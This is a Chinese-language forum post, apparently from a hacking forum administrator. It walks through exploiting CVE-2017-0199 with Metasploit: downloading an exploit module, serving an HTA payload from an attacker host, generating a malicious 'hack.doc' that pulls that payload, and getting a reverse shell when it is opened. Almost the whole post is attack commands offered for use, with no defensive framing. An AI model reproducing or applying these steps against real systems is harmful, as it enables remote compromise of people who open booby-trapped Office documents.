搜索
查看: 2045|回复: 0

CVE-2017-0199利用 优秀

[复制链接]

666

主题

966

帖子

2462

积分

管理员

本论坛第一帅

Rank: 9Rank: 9Rank: 9

积分
2462

热心会员推广达人宣传达人突出贡献优秀版主荣誉管理论坛元老

QQ
发表于 2017-11-27 12:51:07 | 显示全部楼层 |阅读模式


CVE-2017-0199利用





1
下载利用脚本

wget https://raw.githubusercontent.co ... /office_word_hta.rb


2
复制脚本

cp office_word_hta.rb /usr/share/metasploitframework/modules/exploits/windows/fileformat


3
生成HTA

1:运行msfconsle

2:search hta_server


3:set SRVHOST 192.168.5.209

4;run


4
生成doc

1:use exploit/windows/fileformat/office_word_hta

2:set TARGETURI http://192.168.5.209:8082/52jdF5Inq.hta

3:set FILENAME hack.doc


5
运行文件

成功得到反弹





有志者,事竟成,破釜沉舟,百二秦关终属楚. 苦心人,天不负, 卧薪尝胆 ,三千越甲可吞吴
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

快速回复 返回顶部 返回列表